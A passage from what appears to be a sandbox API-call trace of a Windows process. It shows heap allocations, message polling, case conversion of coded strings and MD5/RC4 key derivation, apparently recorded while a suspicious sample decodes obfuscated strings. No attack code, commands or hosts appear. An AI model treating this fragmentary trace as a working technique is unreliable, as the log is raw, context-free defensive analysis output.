(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.046] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.046] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.046] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0206.046] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.047] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0206.047] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.047] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.047] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.047] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.047] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0206.047] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.048] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.048] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.048] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.048] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.048] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.049] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0206.049] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0206.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.049] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0206.049] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.049] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0206.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.050] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0206.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.050] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0206.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0206.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0206.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0206.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0206.050] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0206.051] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.051] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0206.051] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0206.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.052] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0206.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0206.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0206.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0206.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0206.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0206.052] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0206.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0206.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0206.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0206.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0206.053] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0206.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0206.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0206.053] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.053] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0206.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.053] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.053] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.053] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0206.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.054] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0206.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.054] CryptHashData (hHash=0xaa5760, pbData=0x24b1848, dwDataLen=0x3, dwFlags=0x1) returned 1 [0206.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0206.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0206.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.054] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0206.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0206.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0206.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.055] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.055] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0206.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0206.055] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.055] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0206.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0206.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.056] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.056] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.056] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0206.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0206.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.056] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0206.056] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0206.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.057] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0206.057] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.057] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0206.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.057] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.057] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa5760, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0206.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0206.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0206.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.058] HeapFree (in: 